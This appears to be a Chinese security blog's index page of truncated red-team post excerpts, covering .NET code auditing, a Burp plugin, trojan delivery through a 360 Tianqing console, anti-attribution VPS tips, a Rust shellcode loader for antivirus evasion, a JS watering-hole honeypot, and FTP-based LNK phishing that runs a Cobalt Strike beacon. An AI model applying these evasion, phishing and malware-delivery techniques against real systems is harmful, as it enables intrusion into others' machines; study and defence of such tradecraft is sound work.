代码审计-某EIS办公平台0day挖掘审计过程
某EIS办公平台0day挖掘审计过程环境搭建机缘巧合下从好兄弟那拿套源码,好久没审计有点生疏了,搭个环境练练手
虚拟机选择win2012,在Internet信息服务(IIS)上新建网站,设置站点名称和安装路径
在应用程序池中找到对应站点程序池,托管管道模式默认为集成,将其修改为经典模式.NET
新建数据库,与 web.config 连接保持一致即可
12345678set DBNAME=EISset SQLUSER=saset SQLPWD=password01!set SQLSERVER=127.0.0.1,1433 <connectionStrings> <add name="" connectionString="Data Source=.\SQLEXPRESS;User ID=sa;Password=password01!;Initial Catalog=EIS;Connection Timeout=30;Connect Retry Count=3;Connect Retry Interval=10;Poolin ...
安全开发-基于CVE-2025-55182burpsuite被动扫描插件
CVE-2025-55182-burpscanner基于 CVE-2025-55182 burpsuite 被动扫描插件, 使用 JDK 17
https://github.com/Pizz33/CVE-2025-55182-burpscanner
插件使用:默认扫描history / 右键主动扫描,识别到漏洞会自动到 CVE-2025-55182 模块
Deduplication(去重机制)在扫描过程中,为避免重复记录相同漏洞,本工具采用基于 host + path 的唯一性判断:
123使用 host + path 作为漏洞记录的唯一标识当新漏洞与旧记录的唯一标识相同,新记录会覆盖旧记录防止因参数不同或重复扫描导致的数据重复
GET/POST Conversion(GET/POST 自动转换)123GET 请求处理自动转换为 POST 请求保留原始 URL 路径与 Query 参数不改变原始请求结构
IntelliJ IDEA 配置步骤1234561. 添加 burpsuite_pro.jar 为 Library,右键 burpsuite_pr ...
代码审计-红队快速高效挖掘.net系统漏洞技巧
前言在红队攻防对抗中,.NET系统是出现频次比较高,.NET系统由于其架构特性,通常会将业务逻辑封装在DLL程序集中,通过ASPX/ASHX等页面文件进行调用。这种架构使得我们能够通过反编译技术快速还原源代码,结合静态代码审计和动态测试,快速定位SQL注入、命令执行、文件上传、反序列化等常见高危漏洞。本文将围绕获取源码、反编译、漏洞快速定位、绕过技巧和实战案例来帮助师傅们快速在红队场景中挖掘0day
源码获取凌风云网盘 ...
工具开发-从0到1开发web综合扫描器
先上个图,后续会持续更新。。
目录扫描模块
域名扫描模块
红队技术-360天擎后渗透利用
红队技术-360天擎后渗透利用水坑攻击嵌入js跳转到下载exe木马程序的地方
管理控制台下发木马文件分发-文件管理-上传bat
终端管理-终端任务-新建任务-文件分发
选择执行计划
添加任务成功
外网打点-不靠0day组合拳拿下目标站点
外网打点-不靠0day组合拳拿下目标系统案例素材来源于以往参加的攻防比赛和众测项目,旨在拓展外网打点的思路,图片已做去敏处理,如有雷同纯属巧合!
前期准备防溯源临时VPS:https://aws.amazon.com/cn/campaigns/nc20241001/?trk=870dbb43-c500-4476-8a82-5ea9637bd7a7&sc_channel=psm
代理节点IP:https://www.feiyuip.com/
记得勾选掉线禁用网卡✔,防止网络切换过程中泄露真实出口IP
演习规则解读
注意 事项
内容
优先目标
攻击范围:提前沟通好目标分子公司是否算范围内,占比多少,提防裁判变卦;多倍积分:关注多倍积分目标,方法用对,事半功倍
协同合作
攻击细节:补充POC等细节,方便与裁判争论和复现;人员分工:A负责外网打点,B负责内网横向等,避免浪费人力,成果通过语雀或雨墨同步
现场洞察和预判
拿分目标:关注大屏攻击动态,找侧重;热点目标:关注裁判沟通内容,通常会讨论被攻击的目标、攻击队利用的攻击手段等;出局预判:关注大屏 ...
工具开发-Rustloader免杀生成器
Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍,导致杀软对go编译程序静态查杀力度增大,因此转型投入rust的怀抱
说实话,rust的语法是真难懂,边改边查参考github代码总算是捏出来了
加载方式
使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。
使用VirtualAlloc分配远程内存。
使用STD::PTR::COPY将SHELLCODE复制到分配的内存。
使用VirtualProtect将内存权限更改为可执行文件。
使用GetCurrentThread获取当前线程句柄。
使用NtQueueApcThreadEx执行SHELLCODE
使用方式和我之前开发的go千机一样,一样是一键化生成,别问,问就是为了最大化的简便,目录结构如下
解压打开文件目录,把 beacon_x64.bin 放置在当前目录下,点击 一键生成.bat
输出免杀文件在 output 文件夹下,随机六位数命名
捆绑文件选择捆绑文件存放在 bundle 文件夹下,默认放置打开损坏文档
如果不需要捆绑文件,把ma ...
溯源反制-简易蜜罐设计流程
简易蜜罐设计流程设计要点部署方式尽量简便,适配环境兼容性高,与客户实际网络环境单独隔离,防止作为跳板进行横向
水坑攻击
部署仿真系统系统攻击者进行攻击
仿真系统需提供接口供攻击队扫描识别漏洞
通过js水坑触发安全控件弹窗诱使攻击者安装
不安装则会重定向到首页
代码实现
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...
工具开发-go实现屏幕监控截图
开发背景今天好兄弟打项目时候碰到这么一个情况,目标机器访问内网应用需要连接VPN,会切断外网连接,导致beacon无法及时执行回显命令
为了证明能够突破隔离,需要目标机器访问内网应用的截图,于是简单写了下,当作记录
代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go
为了避免后续beacon掉线导致进程一直执行,需要设置生成次数限制
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...
钓鱼技巧-FTP高级LNK钓鱼技术
FTP LNK钓鱼技术背景
常规如果使用捆绑程序绑定正常文件和恶意木马释放,会调用很多windows api 这时候会及其容易引起设备的告警
像一些360的杀毒软件,常会产生 qvm 报毒拦截
并且如果蓝方队伍获取了木马程序,扔沙箱里会导致大量的虚拟beacon上线,对正常的攻防活动造成影响
使用方式1、cobaltstrike 生成 beacon_x64.bin,或者使用其他C2的shellcode(文件命名默认为beacon_x64.bin,更换需修改对应的python文件 )
2、运行 python encrypt.py生成 data.json,里面为加密后的shellcode
3、把 data.json main.py 放到 __init__文件夹里
4、设置属性隐藏文件夹 __init__
1attrib -s -h -r __init__
LNK属性填写
1C:\Windows\System32\ftp.exe -""s:__init__\python.dll
其中 python.dll 内容为
123!start /b __init__ ...







